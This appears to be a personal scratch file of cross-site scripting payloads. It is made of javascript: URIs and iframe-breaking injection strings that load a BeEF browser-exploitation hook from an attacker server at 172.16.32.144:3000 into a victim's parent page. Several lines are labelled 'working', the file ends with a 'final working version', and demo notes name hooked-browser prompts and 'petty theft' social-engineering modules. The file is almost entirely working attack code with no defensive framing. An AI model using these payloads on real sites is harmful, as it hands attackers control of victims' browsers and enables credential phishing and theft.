//default
javascript:alert('uh oh');//

//redirect
javascript:this.parent.location='https://vim.rtorr.com/';//

//beef
javascript:(function(d,s,id){var js, fjs=d.getElementsByTagName(s)[0];if(d.getElementById(id)){return;}js=d.createElement(s);js.id=id;js.onload=function(){window.parent.beef_init();};js.src='//172.16.32.144:3000/hook.js';js.type='text/javascript';fjs.parentNode.insertBefore(js,fjs);}(this.parent.document,'script','v1beefhook1'));//

javascript: (function(d, s, id) {
    var js, fjs = d.getElementsByTagName(s)[0];
    if (d.getElementById(id)) {
        return;
    }
    js = d.createElement(s);
    js.id = id;
    js.onload = function() {
        window.parent.beef_init();
    };
    js.src = '//172.16.32.144:3000/hook.js';
    js.type = 'text/javascript';
    fjs.parentNode.insertBefore(js, fjs);
}(this.parent.document, 'script', 'v1beefhook1')); //


demo:  
cmd > browser > hooked domain > prompt
cmd > social engineering > petty theft

------------------------------


javascript:var x = this.document.body.createElement('script');x.setAttribute('src', 'http://172.16.32.144:3000/hook.js');this.parent.document.head.appendChild(x);//

javascript:(function(){alert('hello');})(this.parent);//

working
javascript:(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)){ return; }js = d.createElement(s); js.id = id;js.onload = function(){alert('loaded');};js.src = '//172.16.32.144:3000/hook.js';fjs.parentNode.insertBefore(js, fjs);}(this.parent.document, 'script', 'v1beefhook1'));//

working, but needs quote escaped properly after url
http://www.vnc.com/\"></iframe><script src=\"http://172.16.32.144:3000/hook.js\"></script><!--

working
javascript:(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)){ return; }js = d.createElement(s); js.id = id;js.onload = function(){alert('loaded');};js.src = '//172.16.32.144:3000/hook.js';js.type='text/javascript';fjs.parentNode.insertBefore(js, fjs);}(this.parent.document, 'script', 'v1beefhook1'));//


javascript:(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)){ return; }js = d.createElement(s); js.id = id;js.onload = function(){debugger;console.log('beef script tag inserted');};js.src = '//172.16.32.144:3000/hook.js';js.type='text/javascript';fjs.parentNode.insertBefore(js, fjs);setTimeout(function() { debugger;beef_init(); }, 2000);}(this.parent.document, 'script', 'v1beefhook1'));//

javascript:(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)){ return; }js = d.createElement(s); js.id = id;js.onload = function(){debugger;window.beef_init();};js.src = '//172.16.32.144:3000/hook.js';js.type='text/javascript';fjs.parentNode.insertBefore(js, fjs);}(this.parent.document, 'script', 'v1beefhook1'));//

***need to load script earlier so that window.onload in the beef script can execute

http://codepen.io\" onmouseover=\"(function(){console.log('testing!');})();\"><\/iframe>

http://codepen.io" onmouseover="(function(){console.log('testing!');})();"></iframe><!--

//

javascript:(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)){ return; }js = d.createElement(s); js.id = id;js.onload = function(){};js.src = '//172.16.32.144:3000/hook.js';js.type='text/javascript';fjs.parentNode.insertBefore(js, fjs);}(this.parent.document, 'script', 'v1beefhook1');//

//really close!
javascript:(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)){ return; }js = d.createElement(s); js.id = id;js.onload = function(){alert('loaded');};js.src = '//172.16.32.144:3000/hook.js';js.type='text/javascript';fjs.parentNode.insertBefore(js, fjs);}(this.parent.document, 'script', 'v1beefhook1'));alert('here');//

javascript:(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)){ return; }js = d.createElement(s); js.id = id;js.onload = function(){alert('loaded');};js.src = '//172.16.32.144:3000/hook.js';js.type='text/javascript';fjs.parentNode.insertBefore(js, fjs);}(this.parent.document, 'script', 'v1beefhook1'));setTimeout(function() { alert('initializing'); }, 4000);//

//final working version.  needs touch ups.
javascript:(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)){ return; }js = d.createElement(s); js.id = id;js.onload = function(){window.parent.beef_init();};js.src = '//172.16.32.144:3000/hook.js';js.type='text/javascript';fjs.parentNode.insertBefore(js, fjs);}(this.parent.document, 'script', 'v1beefhook1'));//




